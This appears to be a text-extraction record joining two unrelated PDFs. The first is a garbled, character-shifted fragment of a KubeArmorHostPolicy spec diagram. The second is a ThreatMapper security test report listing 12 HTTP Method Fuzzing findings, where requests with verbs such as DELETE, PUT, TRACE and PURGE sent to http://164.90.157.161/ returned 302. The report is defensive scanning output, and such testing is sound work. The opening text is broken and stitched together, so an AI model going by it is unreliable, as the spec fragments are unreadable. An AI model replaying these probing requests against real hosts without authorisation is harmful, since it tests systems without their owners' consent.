JU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nList\nList\nListList\nList\nListListListOptional\nOptional\nOptional\nOptionalOptionalOptionalOptionalOptionalOptionalOptional\nOptionalOptionalMandatoryMandatory\nMandatory if these are not defined in each ruleKubeArmorHostPolicy 
Spec Diagram\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^Key Difference between KubeArmorPolicy and KubeArmorHostPolicyKubeArmorPolicy — action: {Allow | Audit | Block}KubeArmorHostPolicy — action: {Allow | Audit | Block}In the case that ‘fromSource’ is defined, then ‘Allow’ is available.No Namespace in the case of KubeArmorHostPolicy\nnodeSelector (not selector)\nListListListList\nListList" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 19_13_47.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 6/Security Test Suite 1/http://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 19:13:47\nTime taken 00:00:08.369\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PURGE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codesAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest COPY http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest UNLOCK http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest LOCK http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PROPFIND http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. 
PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PATCH http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest TRACE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNINGEndpoint http://164.90.157.161/\nRequest OPTIONS http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest HEAD http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest DELETE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PUT http://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod PUT\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest POST http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod POST\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
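The scan above works by replaying the same request with HTTP verbs the API does not declare and flagging any response whose status code is outside the accepted list. The following is a minimal sketch of such a probing loop; the target URL and accepted-status set are placeholders, not values from the report:

```go
package main

import (
	"fmt"
	"net/http"
	"time"
)

func main() {
	target := "http://127.0.0.1:8080/" // placeholder endpoint
	accepted := map[int]bool{200: true, 401: true, 403: true, 404: true, 405: true}
	methods := []string{"PUT", "DELETE", "HEAD", "OPTIONS", "TRACE", "PATCH",
		"PROPFIND", "LOCK", "UNLOCK", "COPY", "PURGE"}

	client := &http.Client{
		Timeout: 5 * time.Second,
		// Do not follow redirects: a 302 is exactly the kind of response the scan flags.
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}

	for _, m := range methods {
		req, err := http.NewRequest(m, target, nil)
		if err != nil {
			fmt.Printf("%-8s request error: %v\n", m, err)
			continue
		}
		resp, err := client.Do(req)
		if err != nil {
			fmt.Printf("%-8s transport error: %v\n", m, err)
			continue
		}
		resp.Body.Close()
		if !accepted[resp.StatusCode] {
			fmt.Printf("%-8s unexpected status %d; check whether this verb should be allowed\n",
				m, resp.StatusCode)
		}
	}
}
```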